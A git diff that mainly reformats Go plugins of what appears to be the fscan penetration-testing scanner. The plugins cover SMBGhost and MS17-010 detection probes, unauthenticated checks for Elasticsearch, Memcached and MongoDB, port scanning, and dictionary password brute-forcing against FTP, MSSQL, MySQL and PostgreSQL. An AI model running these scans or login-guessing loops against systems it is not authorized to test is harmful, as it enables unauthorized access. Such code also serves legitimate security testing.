diff --git a/Plugins/CVE-2020-0796.go b/Plugins/CVE-2020-0796.go
index 1d114bb..57a9f6b 100644
--- a/Plugins/CVE-2020-0796.go
+++ b/Plugins/CVE-2020-0796.go
@@ -1,113 +1,114 @@
package Plugins
-//Ladon Scanner for golang
+
+//Ladon Scanner for golang
//Author: k8gege
//K8Blog: http://k8gege.org
//Github: https://github.com/k8gege
import (
- "../common"
"bytes"
"fmt"
"net"
"sync"
"time"
+
+ "github.com/shadow1ng/fscan/common"
)
const (
- pkt =
- "\x00" + // session
- "\x00\x00\xc0"+ // legth
+ pkt = "\x00" + // session
+ "\x00\x00\xc0" + // legth
- "\xfeSMB@\x00"+ // protocol
+ "\xfeSMB@\x00" + // protocol
- //[MS-SMB2]: SMB2 NEGOTIATE Request
- //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e14db7ff-763a-4263-8b10-0c3944f52fc5
+ //[MS-SMB2]: SMB2 NEGOTIATE Request
+ //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e14db7ff-763a-4263-8b10-0c3944f52fc5
- "\x00\x00" +
- "\x00\x00" +
- "\x00\x00" +
- "\x00\x00" +
- "\x1f\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
+ "\x00\x00" +
+ "\x00\x00" +
+ "\x00\x00" +
+ "\x00\x00" +
+ "\x1f\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
- // [MS-SMB2]: SMB2 NEGOTIATE_CONTEXT
- // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/15332256-522e-4a53-8cd7-0bd17678a2f7
+ // [MS-SMB2]: SMB2 NEGOTIATE_CONTEXT
+ // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/15332256-522e-4a53-8cd7-0bd17678a2f7
- "$\x00" +
- "\x08\x00" +
- "\x01\x00" +
- "\x00\x00" +
- "\x7f\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "x\x00" +
- "\x00\x00" +
- "\x02\x00" +
- "\x00\x00" +
- "\x02\x02" +
- "\x10\x02" +
- "\x22\x02" +
- "$\x02" +
- "\x00\x03" +
- "\x02\x03" +
- "\x10\x03" +
- "\x11\x03" +
- "\x00\x00\x00\x00" +
+ "$\x00" +
+ "\x08\x00" +
+ "\x01\x00" +
+ "\x00\x00" +
+ "\x7f\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "x\x00" +
+ "\x00\x00" +
+ "\x02\x00" +
+ "\x00\x00" +
+ "\x02\x02" +
+ "\x10\x02" +
+ "\x22\x02" +
+ "$\x02" +
+ "\x00\x03" +
+ "\x02\x03" +
+ "\x10\x03" +
+ "\x11\x03" +
+ "\x00\x00\x00\x00" +
+ // [MS-SMB2]: SMB2_PREAUTH_INTEGRITY_CAPABILITIES
+ // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5a07bd66-4734-4af8-abcf-5a44ff7ee0e5
- // [MS-SMB2]: SMB2_PREAUTH_INTEGRITY_CAPABILITIES
- // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5a07bd66-4734-4af8-abcf-5a44ff7ee0e5
+ "\x01\x00" +
+ "&\x00" +
+ "\x00\x00\x00\x00" +
+ "\x01\x00" +
+ "\x20\x00" +
+ "\x01\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x00\x00" +
- "\x01\x00" +
- "&\x00" +
- "\x00\x00\x00\x00" +
- "\x01\x00" +
- "\x20\x00" +
- "\x01\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00\x00\x00" +
- "\x00\x00" +
+ // [MS-SMB2]: SMB2_COMPRESSION_CAPABILITIES
+ // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271
- // [MS-SMB2]: SMB2_COMPRESSION_CAPABILITIES
- // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271
-
- "\x03\x00" +
- "\x0e\x00" +
- "\x00\x00\x00\x00" +
- "\x01\x00" + //CompressionAlgorithmCount
- "\x00\x00" +
- "\x01\x00\x00\x00" +
- "\x01\x00" + //LZNT1
- "\x00\x00" +
- "\x00\x00\x00\x00"
+ "\x03\x00" +
+ "\x0e\x00" +
+ "\x00\x00\x00\x00" +
+ "\x01\x00" + //CompressionAlgorithmCount
+ "\x00\x00" +
+ "\x01\x00\x00\x00" +
+ "\x01\x00" + //LZNT1
+ "\x00\x00" +
+ "\x00\x00\x00\x00"
)
-func SmbGhost(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+
+func SmbGhost(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
SmbGhostScan(info)
wg.Done()
- <- ch
+ <-ch
}
func SmbGhostScan(info *common.HostInfo) {
- ip,port,timeout := info.Host,445,time.Duration(info.Timeout)*time.Second
- addr:=fmt.Sprintf("%s:%d",info.Host,port)
+ ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
+ addr := fmt.Sprintf("%s:%d", info.Host, port)
conn, err := net.DialTimeout("tcp", addr, timeout)
if err != nil {
return
@@ -118,10 +119,10 @@ func SmbGhostScan(info *common.HostInfo) {
n, err := conn.Read(buff)
if err != nil {
return
- }else {
+ } else {
defer conn.Close()
if bytes.Contains([]byte(buff[:n]), []byte("Public")) == true {
- result := fmt.Sprintf("%v CVE-2020-0796 SmbGhost Vulnerable",ip)
+ result := fmt.Sprintf("%v CVE-2020-0796 SmbGhost Vulnerable", ip)
common.LogSuccess(result)
}
}
diff --git a/Plugins/elasticsearch.go b/Plugins/elasticsearch.go
index f89234f..0f2eaf6 100644
--- a/Plugins/elasticsearch.go
+++ b/Plugins/elasticsearch.go
@@ -1,7 +1,6 @@
package Plugins
import (
- "../common"
"fmt"
"io/ioutil"
"net"
@@ -9,46 +8,47 @@ import (
"strings"
"sync"
"time"
+
+ "github.com/shadow1ng/fscan/common"
)
-func elasticsearchScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+func elasticsearchScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
geturl2(info)
- wg.Done()
+ wg.Done()
<-ch
}
-
-func geturl2(info *common.HostInfo) (flag bool,err error) {
+func geturl2(info *common.HostInfo) (flag bool, err error) {
flag = false
- url := fmt.Sprintf("%s:%d/_cat",info.Url,common.PORTList["elastic"])
+ url := fmt.Sprintf("%s:%d/_cat", info.Url, common.PORTList["elastic"])
var client = &http.Client{
- Transport:&http.Transport{
- DialContext:(&net.Dialer{
- Timeout:time.Duration(info.Timeout)*time.Second,
+ Transport: &http.Transport{
+ DialContext: (&net.Dialer{
+ Timeout: time.Duration(info.Timeout) * time.Second,
}).DialContext,
},
- CheckRedirect:func(req *http.Request, via []*http.Request) error{
+ CheckRedirect: func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse
},
}
- res,err:=http.NewRequest("GET",url,nil)
- if err==nil{
- res.Header.Add("User-agent","Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
- res.Header.Add("Accept","*/*")
- res.Header.Add("Accept-Language","zh-CN,zh;q=0.9")
- res.Header.Add("Accept-Encoding","gzip, deflate")
- res.Header.Add("Connection","close")
- resp,err:=client.Do(res)
+ res, err := http.NewRequest("GET", url, nil)
+ if err == nil {
+ res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
+ res.Header.Add("Accept", "*/*")
+ res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
+ res.Header.Add("Accept-Encoding", "gzip, deflate")
+ res.Header.Add("Connection", "close")
+ resp, err := client.Do(res)
- if err==nil{
+ if err == nil {
defer resp.Body.Close()
body, _ := ioutil.ReadAll(resp.Body)
- if strings.Contains(string(body),"/_cat/master"){
- result := fmt.Sprintf("Elastic:%s unauthorized",url)
+ if strings.Contains(string(body), "/_cat/master") {
+ result := fmt.Sprintf("Elastic:%s unauthorized", url)
common.LogSuccess(result)
flag = true
}
}
}
- return flag,err
+ return flag, err
}
diff --git a/Plugins/findnet.go b/Plugins/findnet.go
index 46d04b9..3dd7b94 100644
--- a/Plugins/findnet.go
+++ b/Plugins/findnet.go
@@ -11,33 +11,33 @@ import (
"fmt"
"sync"
- "../common"
+ "github.com/shadow1ng/fscan/common"
)
var (
- buffer_v1, _ = hex.DecodeString("05000b03100000004800000001000000b810b810000000000100000000000100c4fefc9960521b10bbcb00aa0021347a00000000045d888aeb1cc9119fe808002b10486002000000")
- buffer_v2, _ = hex.DecodeString("050000031000000018000000010000000000000000000500")
- buffer_v3, _ = hex.DecodeString("0900ffff0000")
-
+ buffer_v1, _ = hex.DecodeString("05000b03100000004800000001000000b810b810000000000100000000000100c4fefc9960521b10bbcb00aa0021347a00000000045d888aeb1cc9119fe808002b10486002000000")
+ buffer_v2, _ = hex.DecodeString("050000031000000018000000010000000000000000000500")
+ buffer_v3, _ = hex.DecodeString("0900ffff0000")
)
-func Findnet(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+
+func Findnet(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
FindnetScan(info)
wg.Done()
- <- ch
+ <-ch
}
func FindnetScan(info *common.HostInfo) {
- realhost:=fmt.Sprintf("%s:%d",info.Host,135)
- conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
- if err != nil{
+ realhost := fmt.Sprintf("%s:%d", info.Host, 135)
+ conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+ if err != nil {
return
}
- conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
+ conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
defer conn.Close()
conn.Write(buffer_v1)
reply := make([]byte, 4096)
_, err = conn.Read(reply)
- if err != nil{
+ if err != nil {
return
}
conn.Write(buffer_v2)
@@ -47,31 +47,29 @@ func FindnetScan(info *common.HostInfo) {
text := reply[42:]
flag := true
for i := 0; i < len(text)-5; i++ {
- if bytes.Equal(text[i:i+6], buffer_v3){
+ if bytes.Equal(text[i:i+6], buffer_v3) {
text = text[:i-4]
flag = false
break
}
}
- if flag{
+ if flag {
return
}
- read(text,info.Host)
+ read(text, info.Host)
}
-func read(text []byte,host string) {
+func read(text []byte, host string) {
encodedStr := hex.EncodeToString(text)
hostnames := strings.Replace(encodedStr, "0700", "", -1)
hostname := strings.Split(hostnames, "000000")
- result := "NetInfo:\n[*]"+host
+ result := "NetInfo:\n[*]" + host
for i := 0; i < len(hostname); i++ {
hostname[i] = strings.Replace(hostname[i], "00", "", -1)
- host,err := hex.DecodeString(hostname[i])
- if err != nil{
+ host, err := hex.DecodeString(hostname[i])
+ if err != nil {
return
}
- result += "\n [->]"+string(host)
+ result += "\n [->]" + string(host)
}
common.LogSuccess(result)
}
-
-
diff --git a/Plugins/ftp.go b/Plugins/ftp.go
index a0dc197..24a4860 100644
--- a/Plugins/ftp.go
+++ b/Plugins/ftp.go
@@ -1,41 +1,42 @@
package Plugins
import (
- "../common"
- "github.com/jlaffaye/ftp"
"fmt"
"strings"
"sync"
"time"
+
+ "github.com/jlaffaye/ftp"
+ "github.com/shadow1ng/fscan/common"
)
-func FtpScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
- Loop:
- for _,user:=range common.Userdict["ftp"]{
- for _,pass:=range common.Passwords{
+func FtpScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
+Loop:
+ for _, user := range common.Userdict["ftp"] {
+ for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", string(user), -1)
- flag,err := FtpConn(info,user,pass)
- if flag==true && err==nil {
+ flag, err := FtpConn(info, user, pass)
+ if flag == true && err == nil {
break Loop
}
}
}
wg.Done()
- <- ch
+ <-ch
}
-func FtpConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
+func FtpConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
- Host,Port,Username,Password := info.Host, common.PORTList["ftp"],user, pass
- conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v",Host,Port), time.Duration(info.Timeout)*time.Second)
+ Host, Port, Username, Password := info.Host, common.PORTList["ftp"], user, pass
+ conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(info.Timeout)*time.Second)
if err == nil {
- err = conn.Login(Username,Password)
+ err = conn.Login(Username, Password)
if err == nil {
defer conn.Logout()
- result := fmt.Sprintf("FTP:%v:%v:%v %v",Host,Port,Username,Password)
+ result := fmt.Sprintf("FTP:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
flag = true
}
}
- return flag,err
-}
\ No newline at end of file
+ return flag, err
+}
diff --git a/Plugins/memcached.go b/Plugins/memcached.go
index 3737dc6..7e8051f 100644
--- a/Plugins/memcached.go
+++ b/Plugins/memcached.go
@@ -1,31 +1,32 @@
package Plugins
import (
- "../common"
"fmt"
"net"
"strings"
"sync"
"time"
+
+ "github.com/shadow1ng/fscan/common"
)
-func MemcachedScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) (err error, result string) {
- realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["mem"])
- client,err:=net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
- if err==nil {
- client.SetDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
+func MemcachedScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) (err error, result string) {
+ realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["mem"])
+ client, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+ if err == nil {
+ client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
rev := make([]byte, 1024)
n, err := client.Read(rev)
if err == nil {
if strings.Contains(string(rev[:n]), "STAT") {
defer client.Close()
- result = fmt.Sprintf("Memcached:%s unauthorized",realhost)
+ result = fmt.Sprintf("Memcached:%s unauthorized", realhost)
common.LogSuccess(result)
}
}
}
wg.Done()
- <- ch
+ <-ch
return err, result
}
diff --git a/Plugins/mongodb.go b/Plugins/mongodb.go
index ca4dd5c..a7b93dc 100644
--- a/Plugins/mongodb.go
+++ b/Plugins/mongodb.go
@@ -1,49 +1,51 @@
package Plugins
import (
- "../common"
"fmt"
- _ "github.com/denisenkom/go-mssqldb"
"net"
"strings"
"sync"
"time"
+
+ _ "github.com/denisenkom/go-mssqldb"
+ "github.com/shadow1ng/fscan/common"
)
-
-func MongodbScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+func MongodbScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
MongodbUnauth(info)
wg.Done()
- <- ch
+ <-ch
}
-func MongodbUnauth(info *common.HostInfo) (flag bool,err error) {
+func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
flag = false
- send_data := []byte{58,0,0,0,167,65,0,0,0,0,0,0,212,7,0,0,0,0,0,0,97,100,109,105,110,46,36,99,109,100,0,0,0,0,0,255,255,255,255,19,0,0,0,16,105,115,109,97,115,116,101,114,0,1,0,0,0,0}
- getlog_data := []byte{72,0,0,0,2,0,0,0,0,0,0,0,212,7,0,0,0,0,0,0,97,100,109,105,110,46,36,99,109,100,0,0,0,0,0,1,0,0,0,33,0,0,0,2,103,101,116,76,111,103,0,16,0,0,0,115,116,97,114,116,117,112,87,97,114,110,105,110,103,115,0,0}
- realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["mgo"])
- conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
- if err != nil{return}
+ send_data := []byte{58, 0, 0, 0, 167, 65, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 255, 255, 255, 255, 19, 0, 0, 0, 16, 105, 115, 109, 97, 115, 116, 101, 114, 0, 1, 0, 0, 0, 0}
+ getlog_data := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
+ realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["mgo"])
+ conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+ if err != nil {
+ return
+ }
defer conn.Close()
conn.Write(send_data)
buf := make([]byte, 1024)
count, err := conn.Read(buf)
if err != nil {
- return flag,err
+ return flag, err
}
text := string(buf[0:count])
- if strings.Contains(text,"ismaster"){
+ if strings.Contains(text, "ismaster") {
conn.Write(getlog_data)
count, err := conn.Read(buf)
if err != nil {
- return flag,err
+ return flag, err
}
text := string(buf[0:count])
- if strings.Contains(text,"totalLinesWritten"){
+ if strings.Contains(text, "totalLinesWritten") {
flag = true
- result := fmt.Sprintf("Mongodb:%v unauthorized",realhost)
+ result := fmt.Sprintf("Mongodb:%v unauthorized", realhost)
common.LogSuccess(result)
}
}
- return flag,err
-}
\ No newline at end of file
+ return flag, err
+}
diff --git a/Plugins/ms17017.go b/Plugins/ms17017.go
index 8358437..2e5b94f 100644
--- a/Plugins/ms17017.go
+++ b/Plugins/ms17017.go
@@ -8,8 +8,10 @@ import (
//"flag"
"fmt"
"net"
- "../common"
"strings"
+
+ "github.com/shadow1ng/fscan/common"
+
//"sync"
"time"
)
@@ -22,10 +24,10 @@ var (
trans2SessionSetupRequest, _ = hex.DecodeString("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
)
-func MS17010(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+func MS17010(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
MS17010Scan(info)
wg.Done()
- <- ch
+ <-ch
}
func MS17010Scan(info *common.HostInfo) {
@@ -39,7 +41,7 @@ func MS17010Scan(info *common.HostInfo) {
}
defer conn.Close()
- conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
+ conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
conn.Write(negotiateProtocolRequest)
reply := make([]byte, 1024)
// let alone half packet
@@ -78,7 +80,7 @@ func MS17010Scan(info *common.HostInfo) {
for i := 10; i < len(sessionSetupResponse)-1; i++ {
if sessionSetupResponse[i] == 0 && sessionSetupResponse[i+1] == 0 {
os = string(sessionSetupResponse[10:i])
- os = strings.Replace(os, string([]byte{0x00}), "",-1)
+ os = strings.Replace(os, string([]byte{0x00}), "", -1)
break
}
}
@@ -136,4 +138,3 @@ func MS17010Scan(info *common.HostInfo) {
}
}
-
diff --git a/Plugins/mssql.go b/Plugins/mssql.go
index 1cbfaa5..bb29937 100644
--- a/Plugins/mssql.go
+++ b/Plugins/mssql.go
@@ -1,48 +1,44 @@
package Plugins
import (
- "../common"
"database/sql"
"fmt"
_ "github.com/denisenkom/go-mssqldb"
+ "github.com/shadow1ng/fscan/common"
"strings"
"sync"
"time"
)
-
-
-
-func MssqlScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+func MssqlScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
Loop:
- for _,user:=range common.Userdict["mssql"]{
- for _,pass:=range common.Passwords{
+ for _, user := range common.Userdict["mssql"] {
+ for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
- flag,err := MssqlConn(info,user,pass)
- if flag==true && err==nil {
+ flag, err := MssqlConn(info, user, pass)
+ if flag == true && err == nil {
break Loop
}
}
}
wg.Done()
- <- ch
+ <-ch
}
-func MssqlConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
+func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
- Host,Port,Username,Password := info.Host, common.PORTList["mssql"],user, pass
- dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%d;encrypt=disable;timeout=%d", Host,Username,Password,Port,time.Duration(info.Timeout)*time.Second)
+ Host, Port, Username, Password := info.Host, common.PORTList["mssql"], user, pass
+ dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%d;encrypt=disable;timeout=%d", Host, Username, Password, Port, time.Duration(info.Timeout)*time.Second)
db, err := sql.Open("mssql", dataSourceName)
if err == nil {
- db.SetConnMaxLifetime(time.Duration(info.Timeout)*time.Second)
+ db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
defer db.Close()
err = db.Ping()
if err == nil {
- result := fmt.Sprintf("mssql:%v:%v:%v %v",Host,Port,Username,Password)
+ result := fmt.Sprintf("mssql:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
flag = true
}
}
- return flag,err
+ return flag, err
}
-
diff --git a/Plugins/mysql.go b/Plugins/mysql.go
index cb5b048..b45d56e 100644
--- a/Plugins/mysql.go
+++ b/Plugins/mysql.go
@@ -1,46 +1,45 @@
package Plugins
import (
- "../common"
"database/sql"
"fmt"
- _ "github.com/go-sql-driver/mysql"
"strings"
"sync"
"time"
+
+ _ "github.com/go-sql-driver/mysql"
+ "github.com/shadow1ng/fscan/common"
)
-
-
-func MysqlScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+func MysqlScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
Loop:
- for _,user:=range common.Userdict["mysql"]{
- for _,pass:=range common.Passwords{
+ for _, user := range common.Userdict["mysql"] {
+ for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
- flag,err := MysqlConn(info,user,pass)
- if flag==true && err==nil {
+ flag, err := MysqlConn(info, user, pass)
+ if flag == true && err == nil {
break Loop
}
}
}
wg.Done()
- <- ch
+ <-ch
}
-func MysqlConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
+func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
- Host,Port,Username,Password := info.Host, common.PORTList["mysql"],user, pass
- dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/%v?charset=utf8", Username, Password, Host,Port, "mysql")
+ Host, Port, Username, Password := info.Host, common.PORTList["mysql"], user, pass
+ dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/%v?charset=utf8", Username, Password, Host, Port, "mysql")
db, err := sql.Open("mysql", dataSourceName)
- db.SetConnMaxLifetime(time.Duration(info.Timeout)*time.Second)
+ db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
if err == nil {
defer db.Close()
err = db.Ping()
if err == nil {
- result := fmt.Sprintf("mysql:%v:%v:%v %v",Host,Port,Username,Password)
+ result := fmt.Sprintf("mysql:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
flag = true
}
}
- return flag,err
-}
\ No newline at end of file
+ return flag, err
+}
diff --git a/Plugins/portscan.go b/Plugins/portscan.go
index c83d27a..0a7db53 100644
--- a/Plugins/portscan.go
+++ b/Plugins/portscan.go
@@ -2,13 +2,13 @@ package Plugins
import (
"fmt"
+ "github.com/shadow1ng/fscan/common"
"net"
"sort"
"strconv"
"strings"
"sync"
"time"
- "../common"
)
func ParsePort(ports string) []int {
@@ -37,14 +37,14 @@ func ParsePort(ports string) []int {
func ProbeHosts(host string, ports <-chan int, respondingHosts chan<- string, done chan<- bool, model string, adjustedTimeout int) {
Timeout := time.Duration(adjustedTimeout) * time.Second
- for port := range ports{
+ for port := range ports {
start := time.Now()
- con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%d", host, port), time.Duration(adjustedTimeout) * time.Second)
+ con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%d", host, port), time.Duration(adjustedTimeout)*time.Second)
duration := time.Now().Sub(start)
if err == nil {
defer con.Close()
address := host + ":" + strconv.Itoa(port)
- result := fmt.Sprintf("%s open",address)
+ result := fmt.Sprintf("%s open", address)
common.LogSuccess(result)
respondingHosts <- address
}
@@ -65,7 +65,7 @@ func ScanAllports(address string, probePorts []int, threads int, timeout time.Du
go ProbeHosts(address, ports, results, done, model, adjustedTimeout)
}
- for _,port := range probePorts{
+ for _, port := range probePorts {
ports <- port
}
close(ports)
@@ -86,34 +86,34 @@ func ScanAllports(address string, probePorts []int, threads int, timeout time.Du
}
}
-func TCPportScan(hostslist []string,ports string,model string,timeout int) ([]string,[]string){
+func TCPportScan(hostslist []string, ports string, model string, timeout int) ([]string, []string) {
var AliveAddress []string
var aliveHosts []string
probePorts := ParsePort(ports)
lm := 20
- if (len(hostslist)>5 && len(hostslist)<=50) {
+ if len(hostslist) > 5 && len(hostslist) <= 50 {
lm = 40
- }else if(len(hostslist)>50 && len(hostslist)<=100){
+ } else if len(hostslist) > 50 && len(hostslist) <= 100 {
lm = 50
- }else if(len(hostslist)>100 && len(hostslist)<=150){
+ } else if len(hostslist) > 100 && len(hostslist) <= 150 {
lm = 60
- }else if(len(hostslist)>150 && len(hostslist)<=200){
+ } else if len(hostslist) > 150 && len(hostslist) <= 200 {
lm = 70
- }else if(len(hostslist)>200){
+ } else if len(hostslist) > 200 {
lm = 75
}
thread := 5
- if (len(probePorts)>500 && len(probePorts)<=4000) {
- thread = len(probePorts)/100
- }else if (len(probePorts)>4000 && len(probePorts)<=6000) {
- thread = len(probePorts)/200
- }else if (len(probePorts)>6000 && len(probePorts)<=10000) {
- thread = len(probePorts)/350
- }else if (len(probePorts)>10000 && len(probePorts)<50000){
- thread = len(probePorts)/400
- }else if (len(probePorts)>=50000 && len(probePorts)<=65535){
- thread = len(probePorts)/500
+ if len(probePorts) > 500 && len(probePorts) <= 4000 {
+ thread = len(probePorts) / 100
+ } else if len(probePorts) > 4000 && len(probePorts) <= 6000 {
+ thread = len(probePorts) / 200
+ } else if len(probePorts) > 6000 && len(probePorts) <= 10000 {
+ thread = len(probePorts) / 350
+ } else if len(probePorts) > 10000 && len(probePorts) < 50000 {
+ thread = len(probePorts) / 400
+ } else if len(probePorts) >= 50000 && len(probePorts) <= 65535 {
+ thread = len(probePorts) / 500
}
var wg sync.WaitGroup
@@ -125,16 +125,16 @@ func TCPportScan(hostslist []string,ports string,model string,timeout int) ([]s
fmt.Println(s)
}
}()
- for _,host :=range hostslist{
+ for _, host := range hostslist {
wg.Add(1)
limiter <- struct{}{}
go func(host string) {
defer wg.Done()
- if aliveAdd, err := ScanAllports(host, probePorts,thread, 5*time.Second,model,timeout);err == nil && len(aliveAdd)>0{
+ if aliveAdd, err := ScanAllports(host, probePorts, thread, 5*time.Second, model, timeout); err == nil && len(aliveAdd) > 0 {
mutex.Lock()
- aliveHosts = append(aliveHosts,host)
- for _,addr :=range aliveAdd{
- AliveAddress = append(AliveAddress,addr)
+ aliveHosts = append(aliveHosts, host)
+ for _, addr := range aliveAdd {
+ AliveAddress = append(AliveAddress, addr)
}
mutex.Unlock()
}
@@ -143,5 +143,5 @@ func TCPportScan(hostslist []string,ports string,model string,timeout int) ([]s
}
wg.Wait()
close(aliveHost)
- return aliveHosts,AliveAddress
+ return aliveHosts, AliveAddress
}
diff --git a/Plugins/postgres.go b/Plugins/postgres.go
index 870613d..aa3340b 100644
--- a/Plugins/postgres.go
+++ b/Plugins/postgres.go
@@ -1,46 +1,45 @@
package Plugins
import (
- "../common"
"database/sql"
"fmt"
- _ "github.com/lib/pq"
"strings"
"sync"
"time"
+
+ _ "github.com/lib/pq"
+ "github.com/shadow1ng/fscan/common"
)
-func PostgresScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+func PostgresScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
Loop:
- for _,user:=range common.Userdict["postgresql"]{
- for _,pass:=range common.Passwords{
+ for _, user := range common.Userdict["postgresql"] {
+ for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", string(user), -1)
- flag,err := PostgresConn(info,user,pass)
- if flag==true && err==nil {
+ flag, err := PostgresConn(info, user, pass)
